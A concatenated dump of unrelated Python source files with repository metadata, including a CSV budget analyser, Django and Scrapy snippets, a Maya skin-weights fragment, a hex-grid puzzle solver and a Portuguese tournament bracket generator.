94974769dcfab84dbc8f51212317d59376b13fc7 | 9538c0592428c88c1894e66a1ed74141cf2f5eec | /Homework/03-Python/python-challenge_Raw/PyBank/Main_PyBank_v12.py | 7190909d08af46e8a6c0727fefca53b5bc048cd3 | [] | no_license | domaica/copia-MIA-course | cfcd9fc414448792fda20f7ffc49619b1df39045 | 3e5036a5361100d4d886803a8f6be8a03bedcb21 | refs/heads/main | 2023-05-02T17:23:40.251586 | 2021-06-01T13:47:01 | 2021-06-01T13:47:01 | 368,016,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,226 | py | # First we'll import the os module
# This will allow us to create file paths across operating systems
import os
# Module for reading CSV files
import csv
csvpath = os.path.join('Resources-PyBank/budget_data.csv')
# output_path = os.path.join('Resources-PyBank/budget_new.csv')
with open(csvpath) as csvfile:
# CSV reader specifies delimiter and variable that holds contents
csvreader = csv.reader(csvfile, delimiter=',')
# # Read the header row first (skip this step if there is now header)
csv_header = next(csvreader)
# VARIABLES
num_rows = 0
linetotal = 0
total = 0
avgchange = 0.00
initialvalue = 0
totaldif= 0
delta = 0
current_line = 0
prev_line = 0
maxincrease = 0
maxdecrease = 0
max_month = ''
min_month =''
month = ''
for row in csvreader: # Read each row of data after the header
# antes de cargar el valor de la linea, lo resto porque es el valor anterior menos el de ahora al cambiar la linea
if (row == 0):
current_line = int(row[1])
prev_line = int(row[1])
month = str(row[0])
delta = current_line
maxincrease = delta
max_month = month
else:
current_line = int(row[1])
month = str(row[0])
delta = current_line - prev_line
prev_line = int(row[1])
if (delta >= maxincrease):
maxincrease = delta
max_month = month
elif (delta < maxdecrease):
maxdecrease = delta
min_month = month
# total = total + linetotal
# comparo el incremento o decremento actual con el valor maximo o minimo previamente guardado en la variable
def sum_months(): # function to calculate total number of votes
total_months = 0 # initialize variable total_months
with open(csvpath) as csvfile:
# CSV reader specifies delimiter and variable that holds contents
csvreader = csv.reader(csvfile, delimiter=',')
# Skip header row
csv_header = next(csvreader)
for row in csvreader: # iteration of rows in cvs file
total_months = total_months + 1 # Add 1 to total votes
return total_months
def sum_amount(): # function to calculate total number of votes
total_amount = 0 # initialize variable total
linetotal = 0 # initialize variable linetotal
with open(csvpath) as csvfile:
# CSV reader specifies delimiter and variable that holds contents
csvreader = csv.reader(csvfile, delimiter=',')
# Skip header row
csv_header = next(csvreader)
for row in csvreader: # iteration of rows in cvs file
# linetotal = int(row[1])
total_amount = total_amount + int(row[1])
return total_amount
def avg_change(): # function to calculate total number of votes
total_delta = 0
initialvalue = 0
lastvalue = 0 # initialize variable linetotal
with open(csvpath) as csvfile:
# CSV reader specifies delimiter and variable that holds contents
csvreader = csv.reader(csvfile, delimiter=',')
# Skip header row
csv_header = next(csvreader)
for row in csvreader: # Read each row of data after the header
if initialvalue == 0:
initialvalue = int(row[1])
else:
lastvalue = int(row[1])
total_delta = round(((lastvalue - initialvalue) / (total_months - 1)), 2)
return total_delta
# run functions
total_months = sum_months()
total_amount = sum_amount()
total_delta = avg_change()
print(" ")
print(" ")
print(" Financial Analysis")
# print("__________________________")
print("----------------------------")
print("Total Months: " + str(total_months))
print("Total: " + " $ " + str(total_amount))
# print("Average Change: " + " $ " + str(round(avgchange, 2))
print("Average Change: " + " $ " + str(total_delta))
print("Greatest Increase in Profits: " + str(max_month) + " (" + "$" + str(maxincrease) + ")")
print("Greatest Decrease in Profits: " + str(min_month) + " (" + "$" + str(maxdecrease) + ")")
# print("Greatest Increase in Profits: " + str(month_max) + " $ " + str(maxincrease))
# print("Greatest Decrease in Profits: " + str(month_min) + " $ " + str(maxdecrease))
# Begin write new csv
# output_path = os.path.join('Resources-PyBank/budget_new.csv')
# with open(output_path, 'w') as csvfile:
# csvwriter = csv.writer(csvfile, delimiter=',')
# csvwriter.writerow(['Financial Analysis'])
# csvwriter.writerow(["Total Months", str(total_months)])
# csvwriter.writerow(["Total", str(total)])
# csvwriter.writerow(["Average Change" , str(avgchange)])
# csvwriter.writerow(["Greatest Increase in Profits", str(maxincrease)])
# csvwriter.writerow(["Greatest Decrease in Profits", str(maxdecrease)])
# # with open(output_path, 'w') as csvfile:
# writer = csvwriter('Resources-PyBank/budget_new.csv')
# for row in csvreader(csvfile):
# if any(row):
# writer.writerow(row) | [
"idomaica@gmail.com"
] | idomaica@gmail.com |
d149ffd12f666282ebb099b6e5dfa0372a305fd8 | cd774a87f8e2716a57c282154f856a6ae20d26f1 | /BoostedTauAnalysis/CleanJets/cleanjets_cfg.py | a95496ec96b48c1eb244ffb7f48ce73ee282f768 | [] | no_license | friccita/boosted-tau-analysis | fb59d28989f1d7ee40ecb09d1c7f13cf01e00709 | c62cacabf50df7ba2c513c9af6a14f1b60085ff0 | refs/heads/master | 2021-01-17T10:55:08.115931 | 2015-08-10T09:44:22 | 2015-08-10T09:44:22 | 12,270,483 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,601 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("OWNPARTICLES")
process.load("FWCore.MessageService.MessageLogger_cfi")
process.load("BoostedTauAnalysis.CleanJets.cleanjets_cfi")
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.source = cms.Source("PoolSource",
# replace 'myfile.root' with the source file you want to use
fileNames = cms.untracked.vstring(
'file:/data1/yohay/NMSSMHiggs_gg_skim_1000Files.root'
)
)
process.load("SimGeneral.HepPDTESSource.pythiapdt_cfi")
#process.printTree = cms.EDAnalyzer("ParticleTreeDrawer",
# src = cms.InputTag("genParticles"),
# printP4 = cms.untracked.bool(False),
# printPtEtaPhi = cms.untracked.bool(False),
# printVertex = cms.untracked.bool(False),
# printStatus = cms.untracked.bool(True),
# printIndex = cms.untracked.bool(False),
# status = cms.untracked.vint32( 3 )
# )
process.options = cms.untracked.PSet(
SkipEvent = cms.untracked.vstring('ProductNotFound')
)
#process.out = cms.OutputModule("PoolOutputModule",
# fileName = cms.untracked.string('NMSSMHiggs_ZH_skim_PFJetsNoMu.root')
#)
#process.p = cms.Path(process.printTree*process.CleanJets)
process.p = cms.Path(process.CleanJets)
#process.e = cms.EndPath(process.out)
| [
"Rachel.Yohay@cern.ch"
] | Rachel.Yohay@cern.ch |
500ca55d55600422c9796c3e979724c77af12e9d | 56f4456ee15a71c98e834ccf899325973a7624a1 | /django-verdant/archiveit/urls.py | f50a7d5a271cf9c2e640cddde9f1a0abd41f47b3 | [] | no_license | torchbox/verdant-rca | d0a112db74403b36655136f5a42b75960f9fc470 | 93904da6f1e6797d93c63de0d1a29c65545ef1fa | refs/heads/master | 2022-12-14T09:05:40.940426 | 2022-05-26T12:30:41 | 2022-05-26T12:30:41 | 11,999,467 | 12 | 10 | null | 2022-12-08T07:02:23 | 2013-08-09T11:23:11 | Python | UTF-8 | Python | false | false | 143 | py | from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('',
url(r'^(\d+)/$', views.index, name="index"),
)
| [
"noreply@github.com"
] | noreply@github.com |
ed109450dd495417ac223234f1e78a19e41b4190 | 6956291893c1deef10b10e645d18dcacc2819969 | /tpRig/tpSkinWeights.py | 3152f17d514fb22619b12d0cd0b18c03023930db | [] | no_license | thipaulino/tpTools | 19c8bcbd98b1e4d6fc6f015a6f73bd890cedac36 | dbf799eb65b0da0db612b97c9b2bedf0e79bb537 | refs/heads/master | 2023-02-20T04:11:49.767739 | 2023-02-06T10:08:28 | 2023-02-06T10:08:28 | 249,549,932 | 9 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,249 | py | import maya.cmds as cmds
# getting the selection
original_sel = om.MSelectionList()
om.MGlobal.getActiveSelectionList(original_sel)
# getting selected mesh and components
cmds.select(cmds.polyListComponentConversion(toVertex=True))
# get the selected mesh and components
sel = om.MSelectionList()
om.MGlobal.getActiveSelectionList(sel)
if not sel.length():
return
selected_components = om.MObject()
dag = om.MDagPath()
sel.getDagPath(0, dag, selected_components)
dag.extendToShape()
if dag.apiType() != 296:
om.MGlobal.displayError("Selection must be a polygon mesh.")
return
# getting skinclisters name and mobject
def getSkinCluster(self, dag):
"""A convenience function for finding the skinCluster deforming a mesh.
params:
dag (MDagPath): A MDagPath for the mesh we want to investigate.
"""
# useful one-liner for finding a skinCluster on a mesh
skin_cluster = cmds.ls(cmds.listHistory(dag.fullPathName()), type="skinCluster")
if len(skin_cluster) > 0:
# get the MObject for that skinCluster node if there is one
sel = om.MSelectionList()
sel.add(skin_cluster[0])
skin_cluster_obj = om.MObject()
sel.getDependNode(0, skin_cluster_obj)
return skin_cluster[0], skin_cluster_obj
else:
raise RuntimeError("Selected mesh has no skinCluster")
# part something of the post
# doing this can speed up iteration and also allows you to undo all of this
cmds.skinPercent(skin_cluster, pruneWeights=0.005)
mFnSkinCluster = omAnim.MFnSkinCluster(skin_cluster_obj)
inf_objects = om.MDagPathArray()
# returns a list of the DagPaths of the joints affecting the mesh
mFnSkinCluster.influenceObjects(inf_objects)
inf_count_util = om.MScriptUtil(inf_objects.length())
# c++ utility needed for the get/set weights functions
inf_count_ptr = inf_count_util.asUintPtr()
inf_count = inf_count_util.asInt()
influence_indices = om.MIntArray()
# create an MIntArray that just counts from 0 to inf_count
for i in range(0, inf_count):
influence_indices.append(i)
old_weights = om.MDoubleArray()
# don't use the selected_components MObject we made since we want to get the weights for each vertex
# on this mesh, not just the selected one
empty_object = om.MObject()
mFnSkinCluster.getWeights(dag, empty_object, old_weights, inf_count_ptr)
# new_weights just starts as a copy of old_weights
new_weights = om.MDoubleArray(old_weights)
#____________________
# iterate over the selected verts
itVerts = om.MItMeshVertex(dag, selected_components)
while not itVerts.isDone():
this_vert_weight_index = itVerts.index() * inf_count
vert_weights = list(new_weights[this_vert_weight_index: this_vert_weight_index + inf_count])
# makes the weights for the closest vertex equal to the outer vertex
new_weights[this_vert_weight_index: this_vert_weight_index + inf_count] = SOME
AWESOME
FUNCTION
itVerts.next()
# set weights all at once
mFnSkinCluster.setWeights(dag, empty_object, influence_indices, new_weights, True, old_weights)
om.MGlobal.setActiveSelectionList(original_sel)
| [
"tpaulino.com@gmail.com"
] | tpaulino.com@gmail.com |
a6a2cc34a4585bc4cdb06c57d364943c07267440 | 2cbcfb9b9046ac131dc01a6fd048b6920d29cd42 | /排序/归并排序.py | 0cbe99980292db1b81d0c8dee0c1fd456bdca38b | [] | no_license | pulinghao/LeetCode_Python | 6b530a0e491ea302b1160fa73582e838338da3d1 | 82ece6ed353235dcd36face80f5d87df12d56a2c | refs/heads/master | 2022-08-12T21:19:43.510729 | 2022-08-08T03:04:52 | 2022-08-08T03:04:52 | 252,371,954 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,397 | py | #!/usr/bin/env python
# _*_coding:utf-8 _*_
"""
@Time :2020/4/25 4:13 下午
@Author :pulinghao@baidu.com
@File :归并排序.py
@Description :
"""
class Solution(object):
def __init__(self):
self.sortednums = []
self.nums = []
def mergeSort(self, nums):
self.nums = nums
self.sort(0, len(nums) - 1)
return self.nums
pass
def sort(self, left, right):
if left < right:
mid = (left + right) / 2
self.sort(left, mid)
self.sort(mid + 1, right)
self.merge(left, mid, right)
pass
def merge(self, left, mid, right):
self.sortednums = []
i = left
j = mid + 1
while i <= mid and j <= right:
if self.nums[i] < self.nums[j]:
self.sortednums.append(self.nums[i])
i += 1
else:
self.sortednums.append(self.nums[j])
j += 1
while i <= mid:
self.sortednums.append(self.nums[i])
i += 1
while j <= right:
self.sortednums.append(self.nums[j])
j += 1
t = 0
while left <= right:
self.nums[left] = self.sortednums[t]
t += 1
left += 1
pass
if __name__ == '__main__':
print Solution().mergeSort(nums=[5, 4, 3, 2, 1])
| [
"pulinghao@baidu.com"
] | pulinghao@baidu.com |
a9d0bc7546f7ca3723a17a3f5fd7ba086d51f28c | 21bf726bf895569a41a8b8d2db6772dc51f46cfd | /OTHERS/Interviews/Akuna.py | abba9d6a6b4e54cda0048899107ec10a4fa00cc0 | [] | no_license | jeffsnguyen/Python-1 | dd924d25337cd6ac21e321d7b2c5ac17c065d94b | 463d32a61a760d076656c73c9f8c9fadf262438d | refs/heads/master | 2022-03-23T09:50:04.476094 | 2019-12-23T12:32:49 | 2019-12-23T12:32:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,844 | py | def if_none_trivial(x):
if x==0:
return 0
else:
return 1
def violet_search_icecream_shop(stock, max_capacity,demands,n_days,overnight_fee,price,deliver_fee,total_expense=[],expense=0):
delivery_min = max(0,demands[0]-stock)
delivery_max = max(0,sum(demands) - stock)
for delivery in range(delivery_min,delivery_max+1,1):
expense_today = expense + if_none_trivial(delivery)*deliver_fee + delivery*price
expense_today = expense_today + max(0,(stock+delivery-max_capacity))*overnight_fee
stock_next = stock+delivery-demands[0]
print("***********************")
print("expense until yesterday: ",expense)
print("expense until today: ", expense_today)
print(n_days, "remains")
if n_days>1:
violet_search_icecream_shop(stock_next, max_capacity,demands[1:],n_days-1,overnight_fee,price,deliver_fee,total_expense,expense_today)
else:
print("%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%")
print("total expense",expense_today)
total_expense.append(expense_today)
# yield(expense_today)
total_expense=[]
violet_search_icecream_shop(0,10,[1,2,1,4],4,1,3,4,total_expense=total_expense)
print(total_expense)
print("the optimum cost:", min(total_expense))
from collections import defaultdict
def code_preprocessing(delivery_code):
code_dic = defaultdict(list)
i = 0
for code in delivery_code:
crude = code.split('-',1)
code_dic[crude[0]].append((crude[1],i))
i = i+1
print(code_dic)
code_dict = code_preprocessing(["123-2","2345-1","123-3","123-5","2345-5"])
def swarm_delivery(code_dict):
bee = []
for key,value in code_dict:
bee.append(value)
print(bee)
swarm_delivery(code_dict)
| [
"jerryxyx@163.com"
] | jerryxyx@163.com |
969686b5b62be15e63eee3ae8fae86d0e915490d | 13084338fa9d1c72fe32d323bcd2df1417b98e83 | /src/bxcommon/rpc/requests/unsubscribe_rpc_request.py | 54c99f8ba9d6e63606193bafd337205d3b9996b2 | [
"MIT"
] | permissive | bloXroute-Labs/bxcommon | ad45e3a060a7d1afd119513248da036818c7f885 | 03c4cc5adab1ae182e59a609eff273957499ba5d | refs/heads/master | 2023-02-22T00:10:46.755175 | 2022-08-16T19:38:22 | 2022-08-16T19:38:22 | 220,556,144 | 14 | 7 | MIT | 2023-02-07T22:58:14 | 2019-11-08T22:16:37 | Python | UTF-8 | Python | false | false | 2,124 | py | from typing import TYPE_CHECKING, Callable, Optional, Tuple
from bxcommon.feed.feed import FeedKey
from bxcommon.rpc.bx_json_rpc_request import BxJsonRpcRequest
from bxcommon.rpc.json_rpc_response import JsonRpcResponse
from bxcommon.rpc.requests.abstract_rpc_request import AbstractRpcRequest
from bxcommon.rpc.rpc_errors import RpcInvalidParams
from bxcommon.feed.feed_manager import FeedManager
if TYPE_CHECKING:
# noinspection PyUnresolvedReferences
# pylint: disable=ungrouped-imports,cyclic-import
from bxcommon.connections.abstract_node import AbstractNode
class UnsubscribeRpcRequest(AbstractRpcRequest["AbstractNode"]):
    """RPC handler that removes an existing feed subscription by its id."""

    help = {
        "params": "[subscription_id]: Subscription ID returned from subscribe call",
        "description": "Unsubscribe from provided subscription ID"
    }

    def __init__(
        self,
        request: BxJsonRpcRequest,
        node: "AbstractNode",
        feed_manager: FeedManager,
        unsubscribe_handler: Callable[[str], Tuple[Optional[FeedKey], Optional[str]]]
    ) -> None:
        # Stash collaborators before delegating upward: the base constructor
        # presumably invokes validate_params(), which fills subscriber_id
        # (the assert below relies on that).
        self.feed_manager = feed_manager
        self.unsubscribe_handler = unsubscribe_handler
        self.subscriber_id = ""
        super().__init__(request, node)
        assert self.subscriber_id != ""

    def validate_params(self) -> None:
        """Require params to be a one-element list holding the subscription id."""
        params = self.params
        well_formed = (
            isinstance(params, list)
            and len(params) == 1
            and isinstance(params[0], str)
        )
        if not well_formed:
            raise RpcInvalidParams(
                self.request_id,
                "Unsubscribe RPC request params must be a list of length 1."
            )
        self.subscriber_id = params[0]

    async def process_request(self) -> JsonRpcResponse:
        """Drop the subscription and acknowledge with a ``True`` result."""
        feed_key, account_id = self.unsubscribe_handler(self.subscriber_id)
        if feed_key is None:
            raise RpcInvalidParams(
                self.request_id,
                f"Subscriber {self.subscriber_id} was not found."
            )
        self.feed_manager.unsubscribe_from_feed(feed_key, self.subscriber_id, account_id)
        return JsonRpcResponse(self.request_id, True)
| [
"noreply@github.com"
] | noreply@github.com |
e14b2d451d2969b75d400dd4b2b6970aa931b428 | cdd36c72f5f46ed3b9acfe79ef1f9fa7d6aeee6b | /11.py | 700dbfd0dfa7ee7638ca1f96ec7d957f67ac3f9c | [] | no_license | galgeek/advent2017 | 75c0a2e050f495fd60a365ce66b49749635f6d47 | e2c0ad54761af65aeeb50251a44814bacdb0d157 | refs/heads/master | 2021-09-13T12:54:21.491544 | 2018-04-30T03:07:29 | 2018-04-30T03:07:29 | 113,707,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 900 | py | def do11(inp):
def do11(inp):
    """Advent of Code 2017 day 11: walk a hex grid from the file at *inp*.

    Returns the maximum cube-coordinate distance from the origin reached
    at any point during the walk.
    """
    with open(inp) as f:
        path = f.read().rstrip('\n')
    # Cube coordinates (x, y, z); every legal step keeps x + y + z == 0.
    deltas = {
        'n':  (0, 1, -1),
        'ne': (1, 0, -1),
        'se': (1, -1, 0),
        's':  (0, -1, 1),
        'sw': (-1, 0, 1),
        'nw': (-1, 1, 0),
    }
    center = (0, 0, 0)
    pos = center
    steps = path.split(',')
    print(steps)
    farthest = 0
    for step in steps:
        if step in deltas:
            dx, dy, dz = deltas[step]
            pos = (pos[0] + dx, pos[1] + dy, pos[2] + dz)
        farthest = max(farthest, cube_distance(center, pos))
    return farthest  # max distance from center over the whole walk
    # return cube_distance(center, pos)  # final distance from center
def cube_distance(a, b):
    """Hex distance between two cube-coordinate points: the largest axis gap."""
    return max(abs(u - v) for u, v in zip(a, b))
# Prompt for the puzzle input file name and print the answer.
inp = input('input? ')
print("result {}".format(do11(inp)))
| [
"galgeek@me.com"
] | galgeek@me.com |
db8551c3b00fdaa9cea83beff7f976a27482b764 | 0486b6ccf883e9cd7a24bbd89b5420e7de2172b9 | /DRF Study Material/Django REST Code/gs23/manage.py | 0fd63ec5bb04d9d85aeb9039d1fb86e9be16bd10 | [] | no_license | ajitexl/restfrmaework | 2980203d7faa6c8364288283758d32c8f2a37817 | 9ab203748e623516365d9924dcc68acc786a66e1 | refs/heads/main | 2023-02-03T08:52:00.672047 | 2020-12-10T09:50:51 | 2020-12-10T09:50:51 | 320,222,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gs23.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"you@example.com"
] | you@example.com |
5b771ee4fa02ac609d1a9cff17e724f9d74cdcdc | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /all-gists/5041434/snippet.py | a978469c85746091bf61c1a14c4ddfde95ab6244 | [
"MIT"
] | permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 1,470 | py | import requests
from bs4 import BeautifulSoup, NavigableString
def get_review_text(block):
    """Return the plain text of a single review from its container DIV."""
    # Only direct NavigableString children carry the review prose;
    # stripped-empty fragments (whitespace between tags) are dropped.
    fragments = (
        child.strip()
        for child in block.children
        if isinstance(child, NavigableString)
    )
    return "\n".join(text for text in fragments if text)
def get_review_texts(review_html):
    """Return the text of every review on one review page."""
    # Reviews are the direct child DIVs of the productReviews table cell.
    cell = BeautifulSoup(review_html).find(id="productReviews").tr.td
    return [
        get_review_text(div)
        for div in cell.find_all("div", recursive=False)
    ]
def get_review_page_count(review_html):
    """Return the number of review pages advertised by the paging widget.

    Falls back to 1 when the widget is absent or malformed (single-page
    review listings have no paging span at all).
    """
    soup = BeautifulSoup(review_html)
    try:
        # Second-to-last paging link holds the highest page number.
        return int(soup.find("span", class_="paging").find_all("a")[-2].text)
    except (AttributeError, IndexError, ValueError):
        # Narrowed from a bare ``except:`` which also swallowed
        # KeyboardInterrupt/SystemExit. These three cover: no paging span
        # (find() -> None), fewer than two links, non-numeric link text.
        return 1
def get_all_reviews(review_url):
    """Fetch every review page reachable from *review_url* and return all texts."""
    # sanitize the url: drop the trailing path segment
    base_url = "/".join(review_url.split("/")[:-1])
    first_page_html = requests.get(base_url).text
    page_count = get_review_page_count(first_page_html)
    reviews = []
    # Page 1 is fetched again here, matching the original flow: the first
    # request only serves to discover the page count.
    for page in range(1, page_count + 1):
        page_html = requests.get(base_url + "?pageNumber=%d" % page).text
        reviews.extend(get_review_texts(page_html))
    return reviews
"gistshub@gmail.com"
] | gistshub@gmail.com |
146f603a473b11c3f73cbcec091c4585b5f98c62 | dc944218d29e6a1c7263077f63d1129979053dce | /sma_web/views.py | 6f3b57d06aba6742619afe894482d5b943098fb2 | [] | no_license | upasanak/sma_web | 39312e62c5f49da36347ba3b414f7dfba5f8aaff | 0eb1a243607450da557749f1bf480481346d0260 | refs/heads/master | 2022-11-25T01:47:35.342752 | 2020-08-03T13:10:20 | 2020-08-03T13:10:20 | 284,693,083 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 680 | py | from django.shortcuts import render
from django.core.files.storage import FileSystemStorage
from callfile.SMA import *
url = ""
def index(request):
    # Render the landing page; no template context needed.
    return render(request, 'index.html')
def upload_file(request):
    """Handle the SMA upload form.

    On POST: store the uploaded file, run the SMA computation for the
    requested number of days ('nod'), and render the results.

    Bugs fixed: the original bound its context to a local named ``dict``
    (shadowing the builtin) only inside the POST branch, so any non-POST
    request crashed with UnboundLocalError at the final render.  Non-POST
    requests now render the empty form instead.
    """
    context = {}
    if request.method == 'POST':
        uploaded_file = request.FILES['smapy']
        fs = FileSystemStorage()
        fs.save(uploaded_file.name, uploaded_file)
        # NOTE(review): a missing 'nod' field makes int('default') raise
        # ValueError — confirm whether a numeric fallback was intended.
        x = int(request.POST.get('nod', 'default'))
        context = callthisfunc(x)
    return render(request, 'upload_file.html', context)
| [
"noreply@github.com"
] | noreply@github.com |
ec4aa2bdc1ee610a32937e374c246abdec32f28c | 7eea8391de3e115d942657eeaddf875b79418e78 | /4_Implementation/4-1.py | 1ee75dac8b798699ed0f5eafeab15f77e57d656d | [] | no_license | WooniCode/thisIsCodingTest | 13ae8c5df1e143f0592f225161088af3aae555df | 109c63d69daf9b685b6f73dec92bc5b05755dfaa | refs/heads/master | 2023-03-05T10:32:56.084357 | 2021-02-12T10:43:10 | 2021-02-12T10:43:10 | 316,903,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 338 | py | # 예제 4-1. 상하좌우
n = int(input())
p = input().split()
x, y = 1, 1
move_types = ['L', 'R', 'U', 'D']
x_move = [0, 0, -1, 1]
y_move = [-1, 1, 0, 0]
for i in p:
for j in range(len(move_types)):
if move_types[j] == i:
x = min(max(x+x_move[j], 1), n)
y = min(max(y+y_move[j], 1), n)
print(x, y) | [
"jdu2038@gmail.com"
] | jdu2038@gmail.com |
dac74fe07f41bad595f3daece43a0047c4795112 | c105570f12f1d56087ffb831f5d34cd763d6c90b | /top/api/rest/HotelRoomImgDeleteRequest.py | 55f04fe4e6cf46864d486cf6bd4e5cf9dc7d3abd | [] | no_license | wjianwei126/Alinone | 01607423833d7736b2fd3c77e9e21f63c69b4e4c | 80144d4657cb049d651c09647eb245405240f12f | refs/heads/master | 2020-12-07T05:14:58.746777 | 2015-05-06T12:48:33 | 2015-05-06T12:48:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | '''
Created by auto_sdk on 2014-11-09 14:51:18
'''
from top.api.base import RestApi
class HotelRoomImgDeleteRequest(RestApi):
    """Auto-generated TOP request wrapper for taobao.hotel.room.img.delete."""

    def __init__(self, domain='gw.api.taobao.com', port=80):
        RestApi.__init__(self, domain, port)
        # Request parameters; the caller fills these in before sending.
        self.gid = None
        self.position = None

    def getapiname(self):
        # API method name understood by the TOP gateway.
        return 'taobao.hotel.room.img.delete'
| [
"rapospectre@0163.com"
] | rapospectre@0163.com |
554fd554e514477dbcdc9e9967d80baadc86faa6 | 74672f11137ce9021148f64cffbe03203a38a8c3 | /KDstudy/2021-K-Digital-Training-main/Web_Crawling/python-crawler/chapter_6/quotes_3.py | 84795142289039ae8eb8db6b7a48a2cf91440e58 | [
"MIT"
] | permissive | chaerui7967/K_Digital_Training | be59f176e1167aeb06d8d4a715253486e54547a6 | 85d17a6f9b7bfac827ffb9c2877aa510056616bd | refs/heads/master | 2023-08-24T15:24:20.416798 | 2021-10-09T13:11:18 | 2021-10-09T13:11:18 | 373,730,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,005 | py | """http://quotes.toscrape.com/ 크롤러
메인 페이지만 크롤링해서 격언을 수집합니다.
"""
import scrapy
from scrapy.spiders import CrawlSpider
from my_project.items import Quote
class QuotesSpider(CrawlSpider):
    """Crawler that collects Quote items."""
    name = 'quotes'
    allowed_domains = ['quotes.toscrape.com']
    start_urls = ['http://quotes.toscrape.com/']

    def parse(self, response):
        """Scrape Items out of the crawled page."""
        for i, quote_html in enumerate(response.css('div.quote')):
            # For testing, extract only three quotes.
            if i > 2:
                raise scrapy.exceptions.CloseSpider(reason='abort')
            item = Quote()
            item['author'] = quote_html.css('small.author::text').extract_first()
            item['text'] = quote_html.css('span.text::text').extract_first()
            item['tags'] = quote_html.css('div.tags a.tag::text').extract()
            yield item
| [
"chaerui7967@gmail.com"
] | chaerui7967@gmail.com |
f10f2f6cf1e87884fd41a1f447bd4ec809acfdc7 | 5d3ef2c1f16e1a876c81c3c6bc16e3372ce4c1ad | /chavescode.py | f33282f1efb7093c647cf93692fceecdc65d8c42 | [] | no_license | estevamgalvao/chaves-gerador | b40f5f936869249005bca4307d26fee0ff317dec | 4716813b27f75cb74f0861b9b59d729be9b25ace | refs/heads/master | 2021-09-04T00:59:00.676415 | 2018-01-13T18:09:09 | 2018-01-13T18:09:09 | 117,259,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,849 | py | import random
print("Insira o nome dos participantes, um por vez, então digite -fim-.")
lista_participantes = [] #criando uma lista vazia. lista principal do código
lista_trapaca1 = []
lista_trapaca2 = []
confirmacao = 'nao' #começando a variável com valor para conseguir fazer comparações
participante_verif = 'inicio' #começando a variável com valor para conseguir fazer comparações
j = 0 #verifica while de prints dos brackets
k = 0 #auxilia o while pra conferir se o usuário digitou uma confirmação válida (sim ou n)
l = 0 #verifica o while se o usuário quer continuar inserindo novos brackets
ll = 0
lll = 0 #auxilia o while pra conferir se o usuário digitou uma confirmação válida (sim ou n)
opcao_cheat = 0
while(confirmacao=='nao' or confirmacao=='n' or confirmacao=='não'): #while-loop para manter o usuário enquanto n confirmar que quer parar de inscrever participantes
while(participante_verif!='fim'):#while-loop para manter o programa pedindo nomes até 'fim'
participante = input()
lista_participantes.append(participante)
participante_verif = participante.lower()
while(k == 0):#manter o usuário no loop "tem certeza?"
print("Tem certeza que deseja terminar de inscrever participantes?")
confirmacao = input()
confirmacao = confirmacao.lower()
print("")
if (confirmacao == 's' or confirmacao == 'sim'):
k = 1
elif (confirmacao == 'cheats on'):
k = 1
print("Selecione a trapaça:")
print("[1] Quem contra quem;")
opcao_cheat = int(input())
if (opcao_cheat == 1):
while(l==0):
#os whiles a seguir verificam se o participante foi inserido
while(ll==0):
cheat_selecionado1 = input("Participante: ")
count_lista = lista_participantes.count(cheat_selecionado1)
ll = 1
if (count_lista == 0):
print("Participante inválido.")
ll = 0
while(ll==1):
cheat_selecionado2 = input("Adversário: ")
count_lista = lista_participantes.count(cheat_selecionado1)
ll = 0
if (count_lista == 0):
print("Participante inválido.")
ll = 1
lista_participantes.remove(cheat_selecionado1)
lista_trapaca1.append(cheat_selecionado1)
lista_participantes.remove(cheat_selecionado2)
lista_trapaca2.append(cheat_selecionado2)
#estou atribuindo os nomes retirados a 2 listas paralalelas a fim de trabalhar com as 2 usando o mesmo índices e dessa forma, criando os pares trapaceados
tamanho1 = len(cheat_selecionado1)
tamanho2 = len(cheat_selecionado2)
ll = 0
while(lll==0):#manter usuário no loop do "continuar?"
print("Continuar?")
confirmacao2 = input()
confirmacao2 = confirmacao2.lower()
if (confirmacao2 == 's' or confirmacao2 == 'sim'):
lll = 1
elif (confirmacao2=='nao' or confirmacao2=='n' or confirmacao2=='não'):
l = 1
lll = 1
else:
print("Resposta inválida.")
print("")
else:
print("Resposta inválida.")
#lista_participantes.remove('fim')
lista_participantes = lista_participantes[:-1]
num_participantes = len(lista_participantes)
#print("LISTA PARTICIPANTES:", lista_participantes[0])
#lista_participantes.sort()
#print("LISTA PARTICIPANTES:", lista_participantes)
#print('')
if (num_participantes%2!=0):
print("O número de participantes que você inseriu não faz chaves corretas!")
print("Insira outro participante para continuar.")
participante = input()
lista_participantes.append(participante)
print("")
#print(num_participantes)
#print('lista:', lista_participantes)
#print("")
#print("LISTA PARTICIPANTES: ", lista_participantes)
#print("")
#print("LISTA TRAPAÇA 1: ", lista_trapaca1)
#print("")
#print("LISTA TRAPAÇA 2: ", lista_trapaca2)
